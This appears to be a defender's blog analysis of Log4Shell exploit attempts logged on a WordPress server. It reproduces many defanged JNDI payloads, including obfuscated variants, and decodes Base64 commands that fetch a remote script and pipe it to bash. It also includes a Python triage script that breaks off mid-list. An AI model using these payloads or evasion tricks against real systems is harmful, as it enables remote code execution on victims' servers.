CVE-2021-44228 (Log4Shell) access log notes

Attempts to exploit CVE-2021-44228 (Log4Shell) are being reported all over the world, and sure enough, crafted requests were arriving at the WordPress server I run as well. (WordPress is PHP and does not use Log4j, so what follows is the indiscriminate scanning that every reachable web server received, not something aimed at this stack.)

The relevant access log entries are pasted below for reference. The command keeps fields 2, 3 and 6 of each line when split on double quotes, i.e. the request line, the status code and response size, and the User-Agent; IP addresses and domains are defanged with [.].

# zgrep -i "jndi\|\${" access.log* | cut -f 2,3,6 -d '"' | sort -u
GET / HTTP/1.1" 200 12907 "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228[.]com/http443useragent}
GET / HTTP/1.1" 200 13144 "${jndi:ldap://log4shell.huntress[.]com:1389/4ac61c12-0c8c-4552-95f0-dfa4053b4577}
GET / HTTP/1.1" 200 13492 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=}
GET / HTTP/1.1" 200 13501 "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164[.]160:8081/w}
GET / HTTP/1.1" 200 13502 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://1.${hostName}.}
GET / HTTP/1.1" 200 13502 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 200 13502 "${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 200 13502 "${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 200 13502 "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 200 13528 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET / HTTP/1.1" 200 13538 "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j[.]bin${upper:a}ryedge[.]io:80/callback}
GET / HTTP/1.1" 200 13559 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET / HTTP/1.1" 200 13573 "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j[.]bin${upper:a}ryedge[.]io:80/callback}
GET / HTTP/1.1" 301 417 "${jndi:ldap://71ssmbjqg7ezpoqt8okre7gzu.canarytokens[.]com/a
GET / HTTP/1.1" 301 417 "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228[.]com/http80useragent}
GET / HTTP/1.1" 301 417 "/${jndi:ldap://45.130.229[.]168:1389/Exploit}
GET / HTTP/1.1" 301 436 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET / HTTP/1.1" 301 473 "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j[.]bin${upper:a}ryedge[.]io:80/callback}
GET / HTTP/1.1" 301 5357 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164[.]160:8081/w}
GET / HTTP/1.1" 301 5357 "${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=}
GET /$%7Bjndi:dns://45.83.64[.]1/securityscan-http80%7D HTTP/1.1" 301 503 "${jndi:dns://45.83.64[.]1/securityscan-http80}
GET /$%7Bjndi:dns://45.83.64[.]1/securityscan-https443%7D HTTP/1.1" 404 4883 "${jndi:dns://45.83.64[.]1/securityscan-https443}
GET /$%7Bjndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4dd5000002ed8b66100000000f8a500%7D?${jndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4dd5000012ed8b661000000007b0383}=${jndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4dd5000022ed8b661000000005e60bd} HTTP/1.1" 400 392 "${jndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4dd5000082ed8b661000000008d7023}
GET /$%7Bjndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4ddbb0100052bb761000000008284a8%7D?${jndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4ddbb0101052bb76100000000551a4a}=${jndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4ddbb0102052bb7610000000098988a} HTTP/1.1" 400 5522 "${jndi:ldap://167.71.13[.]196:2222/lx-ffff80c7b4ddbb0108052bb76100000000706864}
GET /$%7Bjndi:ldap://167.71.13[.]196:443/lx-ffff80c7b4ddbb0100528cb76100000000cdd757%7D?${jndi:ldap://167.71.13[.]196:443/lx-ffff80c7b4ddbb0101528cb76100000000eac427}=${jndi:ldap://167.71.13[.]196:443/lx-ffff80c7b4ddbb0102528cb76100000000826b15} HTTP/1.1" 400 5522 "${jndi:ldap://167.71.13[.]196:443/lx-ffff80c7b4ddbb0108528cb76100000000ea26ee}
GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228[.]com/http443path%7D HTTP/1.1" 404 4883 "Kryptos Logic Telltale
GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228[.]com/http80path%7D HTTP/1.1" 301 551 "Kryptos Logic Telltale
GET /$%7Bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228[.]com/http80path%7D HTTP/1.1" 404 4883 "Kryptos Logic Telltale
GET /$%7Bjndi:ldaps://ed7d5ae0.probe001.log4j.leakix[.]net:1266/b%7D?${jndi:ldaps://ed7d5ae0.probe001.log4j.leakix[.]net:1266/b}=${jndi:ldaps://ed7d5ae0.probe001.log4j.leakix[.]net:1266/b} HTTP/1.1" 301 780 "${jndi:ldaps://ed7d5ae0.probe001.log4j.leakix[.]net:1266/b}
GET /?test=${jndi:ldap://c6ps4n2g4m3cu6krr8k0cg4y4gyyyh4e4.interact[.]sh/a} HTTP/1.1" 400 392 "Mozilla ${jndi:ldap://c6ps4n2g4m3cu6krr8k0cg4y4gyyyh4e4.interact[.]sh/a}
GET /?x=${jndi:ldap://195.54.160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo} HTTP/1.1" 200 13765 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET /?x=${jndi:ldap://195.54.160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo} HTTP/1.1" 301 836 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET /?x=${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=} HTTP/1.1" 301 5558 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=}
GET /?x=${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo} HTTP/1.1" 200 13763 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET /?x=${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo} HTTP/1.1" 301 836 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET /?x=jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g= HTTP/1.1" 200 13726 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=}
GET /favicon.ico HTTP/1.1" 404 418 "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j[.]bin${upper:a}ryedge[.]io:80/callback}
GET /favicon.ico HTTP/1.1" 404 418 "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j[.]bin${upper:a}ryedge[.]io:80/callback}

A few entries that stood out:

Outbound connection attempts to 45.146.164[.]160 (ports 1389 and 8081)

GET / HTTP/1.1" 200 13501 "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164[.]160:8081/w}
GET / HTTP/1.1" 200 13502 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 200 13502 "${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 200 13502 "${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 200 13502 "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164[.]160:8081/w}
GET / HTTP/1.1" 301 5357 "${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164[.]160:1389/t}

Outbound connection attempt to ed7d5ae0.probe001.log4j.leakix[.]net:1266 (over ldaps)

GET /$%7Bjndi:ldaps://ed7d5ae0.probe001.log4j.leakix[.]net:1266/b%7D?${jndi:ldaps://ed7d5ae0.probe001.log4j.leakix[.]net:1266/b}=${jndi:ldaps://ed7d5ae0.probe001.log4j.leakix[.]net:1266/b} HTTP/1.1" 301 780 "${jndi:ldaps://ed7d5ae0.probe001.log4j.leakix[.]net:1266/b}

Outbound connection attempt to c6ps4n2g4m3cu6krr8k0cg4y4gyyyh4e4.interact[.]sh

GET /?test=${jndi:ldap://c6ps4n2g4m3cu6krr8k0cg4y4gyyyh4e4.interact[.]sh/a} HTTP/1.1" 400 392 "Mozilla ${jndi:ldap://c6ps4n2g4m3cu6krr8k0cg4y4gyyyh4e4.interact[.]sh/a}

Attempted execution of a Base64-encoded command

GET / HTTP/1.1" 200 13492 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=}
GET / HTTP/1.1" 200 13528 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET / HTTP/1.1" 200 13559 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET / HTTP/1.1" 301 436 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET / HTTP/1.1" 301 5357 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=}
GET /?x=${jndi:ldap://195.54.160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo} HTTP/1.1" 200 13765 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET /?x=${jndi:ldap://195.54.160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo} HTTP/1.1" 301 836 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET /?x=${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=} HTTP/1.1" 301 5558 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=}
GET /?x=${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo} HTTP/1.1" 200 13763 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET /?x=${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo} HTTP/1.1" 301 836 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo}
GET /?x=jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g= HTTP/1.1" 200 13726 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=}

Three distinct Base64 strings were submitted:

  • KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=
  • KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo
  • KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTI4LjE5OS4xODAuMjIxOjgwKXxiYXNo

They decode to the following bash commands:

  • (curl -s 45.155.205[.]233:5874/128.199.180[.]221:443||wget -q -O- 45.155.205[.]233:5874/128.199.180[.]221:443)|bash
  • (curl -s 195.54.160[.]149:5874/128.199.180[.]221:80||wget -q -O- 195.54.160[.]149:5874/128.199.180[.]221:80)|bash
  • (curl -s 45.155.205[.]233:5874/128.199.180[.]221:80||wget -q -O- 45.155.205[.]233:5874/128.199.180[.]221:80)|bash

The command fetches a payload from 45.155.205[.]233:5874 or 195.54.160[.]149:5874 and pipes it straight into bash on 128.199.180[.]221 (this WordPress server). The path in the URL, 128.199.180[.]221:443 or 128.199.180[.]221:80, appears to be the victim's own address and the port that was probed, so the stager knows which target is calling back. Because wget is given `-O -`, the payload is written to standard output (curl -s does the same by default) and piped into bash, so the downloaded payload never touches disk.

Obfuscation of the jndi and ldap strings

GET / HTTP/1.1" 200 13502 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://1.${hostName}.}
GET / HTTP/1.1" 200 13501 "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164[.]160:8081/w}
GET / HTTP/1.1" 301 473 "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j[.]bin${upper:a}ryedge[.]io:80/callback}
GET / HTTP/1.1" 301 5357 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164[.]160:8081/w}
GET / HTTP/1.1" 301 5357 "${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164[.]160:1389/t}
GET / HTTP/1.1" 301 5357 "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164[.]160:1389/t}

The strings jndi and ldap are obfuscated to slip past simple string matching (a plain grep for "jndi"). Every variant relies on Log4j's own lookup syntax, which the vulnerable logger evaluates before the JNDI lookup runs: ${lower:x} and ${upper:x} change case (lookup prefixes are matched case-insensitively, so jNdI still works), and ${env:ENV_NAME:-j} and ${::-j} are lookups with a :- default value, so an unset variable or an empty lookup evaluates to the single character after :-. Nothing in the raw line matches "jndi" until the lookups are resolved, which is why the grep above also keys on ${.
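As an added example (my own code, not part of the original post), here is a small Python triage script that does what the grep above cannot: it resolves the nested lookups the way Log4j would on a host where the referenced variables do not exist (taking the :- default for ${::-x} and ${env:NAME:-x}, applying lower/upper, and substituting a placeholder for anything else such as ${hostName}), then extracts scheme, host, port and path of every ${jndi:...} lookup in a line, URL-decoded request path included, and decodes the /Basic/Command/Base64/ payload from the earlier section. The sample lines are copied from the log excerpt above and kept defanged; the function and variable names are my own.

```python
"""Normalise obfuscated Log4j lookups in access-log lines and pull out the JNDI
target (and any Base64 "Basic/Command" payload) for triage. Added example."""
import base64
import re
from urllib.parse import unquote

# Innermost lookup: ${...} whose body holds no further '$', '{' or '}'.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A fully resolved JNDI lookup: ${jndi:<scheme>:/<host>[:<port>]<path>}
JNDI = re.compile(r"\$\{jndi:(\w+):/+([^/:}$]+)(?::(\d+))?([^}]*)\}", re.I)
# JNDIExploit-style command delivery path: /Basic/Command/Base64/<base64 shell command>
B64_CMD = re.compile(r"/Basic/Command/Base64/([A-Za-z0-9+/=]+)")


def _resolve(match):
    """Evaluate one innermost lookup the way Log4j 2 would on a host where none of
    the referenced variables exist, i.e. fall back to the :- default value."""
    body = match.group(1)
    if body.lower().startswith("jndi:"):
        return match.group(0)            # this is what we want to surface: keep it
    if ":-" in body:                     # ${::-j}, ${env:ENV_NAME:-j}, ${sys:x:-y} -> the default
        return body.split(":-", 1)[1]
    if body.lower().startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.lower().startswith("upper:"):
        return body[len("upper:"):].upper()
    return "<" + body + ">"              # unknown lookup such as ${hostName}: placeholder so the
                                         # enclosing lookup becomes readable instead of stalling


def normalize(text: str) -> str:
    """Resolve innermost lookups repeatedly until only ${jndi:...} (or nothing) is left."""
    while True:
        resolved = INNERMOST.sub(_resolve, text)
        if resolved == text:
            return text
        text = resolved


def find_jndi(line: str) -> list:
    """Return one dict per JNDI lookup in the line (request path and User-Agent alike)."""
    hits = []
    for m in JNDI.finditer(normalize(unquote(line))):
        scheme, host, port, path = m.groups()
        command = None
        b64 = B64_CMD.search(path)
        if b64:
            try:
                command = base64.b64decode(b64.group(1)).decode("utf-8", "replace")
            except ValueError:           # binascii.Error is a ValueError subclass
                command = None
        hits.append({
            "scheme": scheme.lower(),
            "host": host.lower(),        # DNS is case-insensitive, so ${upper:a} in a hostname changes nothing
            "port": int(port) if port else None,
            "path": path,
            "command": command,          # decoded shell command, or None
        })
    return hits


# Constructed input: five lines copied from the log excerpt on this page (defanged with [.]).
SAMPLE_LINES = [
    'GET / HTTP/1.1" 200 13492 "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMjguMTk5LjE4MC4yMjE6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzEyOC4xOTkuMTgwLjIyMTo0NDMpfGJhc2g=}',
    'GET / HTTP/1.1" 200 13501 "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164[.]160:8081/w}',
    'GET / HTTP/1.1" 200 13502 "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164[.]160:1389/t}',
    'GET / HTTP/1.1" 200 13538 "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j[.]bin${upper:a}ryedge[.]io:80/callback}',
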